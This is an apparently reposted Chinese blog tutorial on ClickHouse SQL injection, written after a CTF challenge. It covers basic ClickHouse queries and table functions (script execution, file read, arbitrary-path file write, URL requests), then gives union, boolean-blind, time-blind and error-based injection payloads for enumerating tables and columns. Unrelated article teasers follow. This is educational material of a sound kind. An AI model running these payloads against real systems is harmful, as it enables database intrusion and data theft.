clickhouse注入手法总结

clickhouse注入手法总结

diannao/2025/7/3 10:26:36/文章来源:https://blog.csdn.net/2401_83799022/article/details/147069420

clickhouse

遇到一题clickhouse注入相关的，没有见过，于是来学习clickhouse的使用，并总结相关注入手法。

环境搭建

直接在docker运行

docker pull clickhouse/clickhouse-server

docker run -d --name some-clickhouse-server --ulimit nofile=262144:262144 clickhouse/clickhouse-server

基础sql语句

列出数据库

show databases;

列出表

show tables;

查看表结构

desc system.databases;

select name,database,data_path from system.databases;

建表语句

CREATE DATABASE IF NOT EXISTS helloworld;

CREATE TABLE helloworld.my_first_table
(
user_id UInt32,
message String,
timestamp DateTime,
metric Float32
)
ENGINE = MergeTree()
PRIMARY KEY (user_id, timestamp)

插入数据

INSERT INTO helloworld.my_first_table (user_id, message, timestamp, metric) VALUES
(101, 'Hello, ClickHouse!', now(), -1.0 ),
(102, 'Insert a lot of rows per batch', yesterday(), 1.41421 ),
(102, 'Sort your data based on your commonly-used queries', today(), 2.718 ),
(101, 'Granules are the smallest chunks of data read', now() + 5, 3.14159 )

system 数据库

这个数据库存储了数据库信息、表信息、字段信息

select name,table,database from system.tables where database=database();

select name,table from system.columns where table='my_first_table';

infomation_schema 数据库

这个数据库也是存储了数据库、表、字段信息

查表

查列

常规函数

常规函数就是产生一个值的函数

字符串拼接

concatWithSeparator(sep, expr1, expr2, expr3...);

字符串切割

select substring('abcdef',2,3);

字符串比较

select startsWith(str, prefix)

select endsWith(str, suffix)

编码

select ascii('a')

select char(97)

select base64Encode('clickhouse')

select base64Decode('Y2xpY2tob3VzZQ==')

sleep

当sleep参数大于3时，不运行，直接报错

聚合函数

字段拼接

select groupArray(message) from my_first_table

groupArray的返回结果是数组，不能直接与字符串类型进行union操作

select groupArray(message) from my_first_table union all select '123';

得先把数组转换成字符串，才能进行union

select arrayStringConcat(groupArray(message),',') from my_first_table;

表函数

表函数就是接在from后面的，返回的结果作为一张表，能够被查询

执行脚本文件

在/var/lib/clickhouse/user_scripts/这个目录下创建脚本文件：

python
#!/usr/bin/python3
import sys
import string
import random

def main():
# Read input value
for number in sys.stdin:
i = int(number)

# Generate some random rows
for id in range(0, i):
letters = string.ascii_letters
random_string = ''.join(random.choices(letters ,k=10))
print(str(id) + '\t' + random_string + '\n', end='')

# Flush results to stdout
sys.stdout.flush()

if __name__ == "__main__":
main()

执行sql语句：SELECT * FROM executable('1.py', TabSeparated, 'id UInt32, random String', (SELECT 10))

其中TabSeparated表示脚本文件的输出每行以\t符号分隔，用于解析结果，可以换成TSV

如果脚本文件的输出以逗号结尾，那么就写CSV

最后一个参数要传入一个query语句，结果会被传入脚本文件的标准输入

用什么解释器执行脚本，取决于文件开头的注释#!/

当尝试跨目录执行文件时，报错：

文件读取

按照一定的格式读取文件，要求文件的路径在user_files下

语法：

file([path_to_archive ::] path [,format] [,structure] [,compression])

例如文件内容为：

java
1,2,3
3,2,1
1,3,2

查询sql语句：SELECT * FROM file('1.txt', 'CSV', 'column1 UInt32, column2 UInt32, column3 UInt32');

写文件

没有别的限制，任意位置都可写

select 1,2,3 union all select 123,4556,789 into outfile '/tmp/1.txt';

发起网络请求

SELECT * FROM url('http://127.0.0.1:12345/', CSV, 'column1 String, column2 UInt32', headers('Accept'='text/csv; charset=utf-8'));

其他

除了上述表函数，还能够发起mysql连接，jdbc连接，redis连接，详细可以查阅文档。总之功能十分多样

注入手法

获取表名：

select arrayStringConcat(groupArray(name),',') from system.tables where database=database()

select arrayStringConcat(groupArray(table),',') from system.tables where database=database()

select arrayStringConcat(groupArray(table_schema),',') from information_schema.tables where table_schema=database()

获取列名

select arrayStringConcat(groupArray(name),',') from system.columns where table='your_table'

select arrayStringConcat(groupArray(column_name),',') from information_schema.tables where table_name='your_table'

联合注入

要点：

1. 不能写union select，应该写union all select 或者union distinct select

2. 两个查询对应的列的数据类型要相同

布尔盲注

和mysql差不多，就是注意一下有哪些函数可以互相平替的，比如字符串截取，编码等函数，方便绕过对特定函数的过滤。

ascii(substr('xxx',0,1))=97

if(ascii(substr('xxx',0,1)) = 97,0,1)

时间盲注

if(ascii(substr('xxx',0,1)) = 97,0,sleep(1))

可以执行其他耗时的查询代替sleep：

报错注入

select 1 where 1=CAST((select database()) as UInt32)

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/diannao/77229.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

智能语音识别工具开发手记

智能语音识别工具开发手记

智能语音识别工具开发手记序言：听见数字化的声音在县级融媒体中心的日常工作中，我们每天需要处理大量音频素材——从田间地头的采访录音到演播室的节目原声，从紧急会议记录到专题报道素材。二十多年前，笔者刚入职时&#xff0…

阅读更多...

TDengine 3.3.6.0 版本中非常实用的 Cols 函数

TDengine 3.3.6.0 版本中非常实用的 Cols 函数

简介在刚刚发布的 TDengine 3.3.6.0 版本中，新增了一个非常实用的函数COLS ，此函数用于获取选择函数所在行列信息，主要应用在生成报表数据，每行需要出现多个选择函数结果，如统计每天最大及最小电压，并报…

阅读更多...

【AI学习】AI Agent（人工智能体）

【AI学习】AI Agent（人工智能体）

1，AI agent 1）定义是一种能够感知环境、基于所感知到的信息进行推理和决策，并通过执行相应动作来影响环境、进而实现特定目标的智能实体。它整合了多种人工智能技术，具备自主学习、自主行动以及与外界交互的能力，旨…

阅读更多...

【MCP】VSCode Cline配置MongoDB连接

【MCP】VSCode Cline配置MongoDB连接

VSCode MCP插件配置MongoDB连接教程前言本文将介绍如何在VSCode中配置Cline插件连接MongoDB。环境准备 VSCodeNode.jsMongoDB服务器Cline插件配置步骤 1. 安装MCP插件在VSCode扩展商店中搜索"Cline"并安装。安装完之后需要配置API平台以及设置API-KEY。…

阅读更多...

this指针和类的继承

this指针和类的继承

一、this指针 Human类的属性fishc与Human（）构造器的参数fishc同名，但却是两个东西。使用this指针让构造器知道哪个是参数，哪个是属性。 this指针：指向当前的类生成的对象 this -> fishc fishc当前对象（…

阅读更多...

使用PyTorch训练VGG11模型：Fashion-MNIST图像分类实战

使用PyTorch训练VGG11模型：Fashion-MNIST图像分类实战

本文将通过代码实战，详细讲解如何使用 PyTorch 和 VGG11 模型在 Fashion-MNIST 数据集上进行图像分类任务。代码包含数据预处理、模型定义、训练与评估全流程，并附上训练结果的可视化图表。所有代码可直接复现，适合深度学习初学者和进阶开发者…

阅读更多...

汽车BMS技术分享及其HIL测试方案

汽车BMS技术分享及其HIL测试方案

一、BMS技术简介在全球碳中和目标的战略驱动下，新能源汽车产业正以指数级速度重塑交通出行格局。动力电池作为电动汽车的"心脏"，其性能与安全性不仅直接决定了车辆的续航里程、使用寿命等关键指标，更深刻影响着消费者对电动汽车的…

阅读更多...

打造船岸“5G+AI”智能慧眼智驱力赋能客船数智管理

打造船岸“5G+AI”智能慧眼智驱力赋能客船数智管理

项目介绍船舶在航行、作业过程中有着严格的规范要求，但在实际航行与作业中往往会因为人为的疏忽，发生事故，导致人员重大伤亡和财产损失； 为推动安全治理模式向事前预防转型，实现不安全状态和行为智能预警&#xff0c…

阅读更多...

C#二叉树

C#二叉树

C#二叉树二叉树是一种常见的数据结构，它是由节点组成的一种树形结构，其中每个节点最多有两个子节点。二叉树的一个节点通常包含三部分：存储数据的变量、指向左子节点的指针和指向右子节点的指针。二叉树可以用于多种算法和操作，…

阅读更多...

WinForm真入门(11)——ComboBox控件详解

WinForm真入门(11)——ComboBox控件详解

WinForm中 ComboBox 控件详解‌ ComboBox 是 WinForms 中一个集文本框与下拉列表于一体的控件，支持用户从预定义选项中选择或直接输入内容。以下从核心属性、事件、使用场景到高级技巧的全面解析： 一、ComboBox 核心属性‌ 属性说明示例‌Items‌下拉…

阅读更多...

超详细解读：数据库MVCC机制

超详细解读：数据库MVCC机制

之前文章：Mysql锁_exclusivelock for update写锁-CSDN博客中有提到通过MVCC来实现快照读，从而解决幻读问题，这里详细介绍下MVCC。一、前言表1：实例表t idk1122 表2：事务A、B、C的执行流程事务A事务B事务Cstart …

阅读更多...

【SpringCloud】从入门到精通【上】

【SpringCloud】从入门到精通【上】

今天主播我把黑马新版微服务课程MQ高级之前的内容都看完了，虽然在看视频的时候也记了笔记，但是看完之后还是忘得差不多了，所以打算写一篇博客再温习一下内容。课程坐标:黑马程序员SpringCloud微服务开发与实战微服务认识单体架构单体架…

阅读更多...

力扣hot100_回溯(2)_python版本

力扣hot100_回溯(2)_python版本

一、39. 组合总和（中等） 代码： class Solution:def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:ans []path []def dfs(i: int, left: int) -> None:if left 0:# 找到一个合法组合ans.append(pa…

阅读更多...

AI平台如何实现推理？数算岛是一个开源的AI平台（主要用于管理和调度分布式AI训练和推理任务。）

AI平台如何实现推理？数算岛是一个开源的AI平台（主要用于管理和调度分布式AI训练和推理任务。）

数算岛是一个开源的AI平台，主要用于管理和调度分布式AI训练和推理任务。它基于Kubernetes构建，支持多种深度学习框架（如TensorFlow、PyTorch等）。以下是数算岛实现模型推理的核心原理、架构及具体实现步骤： 一、数算岛…

阅读更多...

cesium项目之cesiumlab地形数据加载

cesium项目之cesiumlab地形数据加载

之前的文章我们有提到，使用cesiumlab加载地形出现了一些错误，没有解决，今天作者终于找到了解决方法，下面描述一下具体步骤，首先在地理数据云下载dem数据，在cesiumlab中使用地形切片，得到terrain…

阅读更多...

[Vue]App.vue讲解

[Vue]App.vue讲解

页面中可以看见的内容不再在index.html中进行编辑，而是在App.vue中进行编辑。组件化开发在传统的html开发中，一个页面的资源往往都写在同一个html文件中。这种模式在开发小规模、样式简单的项目时会相当便捷，但当项目规模越来越大&#xf…

阅读更多...

sql-labs靶场 less-1

sql-labs靶场 less-1

文章目录 sqli-labs靶场less 1 联合注入 sqli-labs靶场每道题都从以下模板讲解，并且每个步骤都有图片，清晰明了，便于复盘。 sql注入的基本步骤注入点注入类型字符型：判断闭合方式 （‘、"、’、“”&#xf…

阅读更多...

蓝桥杯-小明的彩灯(差分)

蓝桥杯-小明的彩灯(差分)

问题描述： 差分数组 1. 什么是差分数组？ 差分数组 c 是原数组 a 的“差值表示”，其定义如下： c[0] a[0]c[i] a[i] - a[i-1] （i ≥ 1） 差分数组记录了相邻元素的差值。例如，原数组 a [1, …

阅读更多...

精品可编辑PPT | 基于湖仓一体构建数据中台架构大数据湖数据仓库一体化中台解决方案

精品可编辑PPT | 基于湖仓一体构建数据中台架构大数据湖数据仓库一体化中台解决方案

本文介绍了基于湖仓一体构建数据中台架构的技术创新与实践。它详细阐述了数据湖、数据仓库和数据中台的概念，分析了三者的区别与协作关系，指出数据湖可存储大规模结构化和非结构化数据，数据仓库用于高效存储和快速查询以支持决策，…

阅读更多...

最近api.themoviedb.org无法连接的问题解决

最近api.themoviedb.org无法连接的问题解决

修改NAS的host需要用到SSH终端连接工具，比如常见的Putty，XShell，或者FinalShell等都可以，我个人还是习惯Putty。 1.输入命令“ sudo -i ”回车，提示输入密码，密码就是我们NAS的登录密码，输入的…

阅读更多...

最新文章